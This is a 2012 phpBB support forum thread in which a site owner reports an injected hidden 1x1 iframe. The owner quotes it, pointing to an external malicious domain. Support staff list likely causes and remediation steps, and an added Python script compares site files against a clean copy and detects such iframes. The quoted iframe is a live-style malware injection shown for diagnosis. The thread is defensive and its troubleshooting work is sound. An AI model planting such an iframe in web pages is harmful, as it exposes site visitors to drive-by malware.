Annoying malware google warning

END OF SUPPORT: 1 January 2017 (announcement)
azzurri
Registered User
Posts: 899
Joined: Fri Jul 21, 2006 7:48 pm

Annoying malware google warning

Post by azzurri » Tue Mar 13, 2012 7:58 pm

Hi,

For a period of 6 months I've been getting warnings from Google that my site is infected with malware, bad code. It is indeed. My host helped me find some bad code with "Grep" and found the code in Files/index.htm.

Of all my sites and pages, it is only my phpBB that is infected. I have always updated to latest release. I do have some mods installed, but I'm not sure if that's the problem.

If I remove the code, it just comes back. I don't know what else to do. I'm quite desperate to be honest.
Anyone else have this problem?

This time Google warns about this code...

Code:

<iframe src="http://hlqmwspl.co.cc/QQkFBg0MBAEDAAABEkcJBQcEBAYDBAAMBA==" width="1" height="1">
It's always hlqmwspl.co.cc similar code.

Noxwizard
Support Team Leader
Posts: 10262
Joined: Mon Jun 27, 2005 8:41 pm
Location: Texas, USA
Name: Patrick Webster

Re: Annoying malware google warning

Post by Noxwizard » Tue Mar 13, 2012 8:13 pm

Since you chose not to provide any information in your last incident ticket, you'll have to go through this manually. This can happen for several reasons:
  1. There's a backdoor script sitting somewhere on your account
  2. There's a vulnerability in one of your other scripts
  3. Your FTP credentials have been compromised
  4. There's a compromised account elsewhere on the server and the accounts aren't jailed
  5. There's a vulnerability in the server software
1 & 2 can be found by sifting through your access logs looking for anomalous accesses. 3 can be checked by going through your FTP logs and looking for IPs that aren't yours. For each script you run on your site, you should run a comparison (i.e. WinMerge) against a clean copy of the software and check for changes. It will also list any new files that do not normally exist in the software. If 3 is the case, then you need to run antivirus scans on every computer that has ever accessed your site's FTP account. 4 & 5 are when you've exhausted 1 - 3.
[Support Template] - [Read Before Posting] - [phpBB Knowledge Base]
Do not contact me for private support, please share the question in our forums.
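
The clean-copy comparison described in the reply above, scripted as an added example (not part of the original thread and not phpBB code). It reports files that were modified, added or missing relative to a clean copy of the same release, and flags changed files that contain a hidden iframe like the one quoted in the first post. The function names, the regex heuristic and the sample trees are assumptions made for illustration.

```python
import hashlib
import re
import sys
import tempfile
from pathlib import Path

# Heuristic for the kind of tag quoted in the thread: an <iframe> whose width and height are both 0 or 1.
HIDDEN_IFRAME = re.compile(
    rb'<iframe\b(?=[^>]*\bwidth\s*=\s*["\']?[01]\b)(?=[^>]*\bheight\s*=\s*["\']?[01]\b)[^>]*>',
    re.IGNORECASE)

def tree_hashes(root):
    """Map each file path (relative to root) to the SHA-256 of its contents."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}

def audit(clean_root, live_root):
    """Compare the live tree with a clean copy of the same release."""
    clean, live = tree_hashes(clean_root), tree_hashes(live_root)
    report = {
        "modified": sorted(f for f in live if f in clean and live[f] != clean[f]),
        "added": sorted(f for f in live if f not in clean),
        "missing": sorted(f for f in clean if f not in live),
    }
    # Only changed or new files are worth scanning; unchanged ones match the clean release.
    suspects = report["modified"] + report["added"]
    report["hidden_iframe"] = [f for f in suspects
                               if HIDDEN_IFRAME.search((Path(live_root) / f).read_bytes())]
    return report

def demo():
    """Audit a constructed clean/live pair (sample data, not from the thread)."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp, "clean"), Path(tmp, "live")
        for root in (clean, live):
            (root / "files").mkdir(parents=True)
            (root / "index.php").write_text("<?php // board index\n")
            (root / "files" / "index.htm").write_text("<html><body></body></html>\n")
        # Constructed tampering: an injected 1x1 iframe and a file the release never shipped.
        (live / "files" / "index.htm").write_text(
            '<html><body><iframe src="http://placeholder.invalid/x" width="1" height="1"></body></html>\n')
        (live / "files" / "extra.php").write_text("<?php // not in the clean copy\n")
        return audit(clean, live)

if __name__ == "__main__":
    result = audit(sys.argv[1], sys.argv[2]) if len(sys.argv) == 3 else demo()
    for kind, files in result.items():
        for name in files:
            print(f"{kind}\t{name}")
```

Run it with the clean copy's directory first and the downloaded site copy second. Files the board writes at runtime (configuration, cache, uploads) will also appear as modified or added and need a manual look.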

azzurri
Registered User
Posts: 899
Joined: Fri Jul 21, 2006 7:48 pm

Re: Annoying malware google warning

Post by azzurri » Tue Mar 13, 2012 8:29 pm

Thank you for your reply. Very kind of you. Sadly though I am not very good with these things. I know nothing about backdoors and servers and so on. I'm just an amateur trying to run a forum. I've been doing so for many years though without problems. To be honest, it seems as if I will have to give up since it will be up to me to fix this and I won't be able to. I don't have the knowledge to do so. This really, really sucks :cry:

Slackervaara
Registered User
Posts: 195
Joined: Thu Feb 28, 2008 7:46 am

Re: Annoying malware google warning

Post by Slackervaara » Tue Mar 13, 2012 9:06 pm

With this malware scanner you could get some extra information which file(s) are infected:
http://sitecheck.sucuri.net/scanner/

Noxwizard
Support Team Leader
Posts: 10262
Joined: Mon Jun 27, 2005 8:41 pm
Location: Texas, USA
Name: Patrick Webster

Re: Annoying malware google warning

Post by Noxwizard » Wed Mar 14, 2012 1:08 am

At this stage, scanners like that aren't any help. They only let you know that the site has malware on it, but we already know that. It won't help you find the actual modified files.
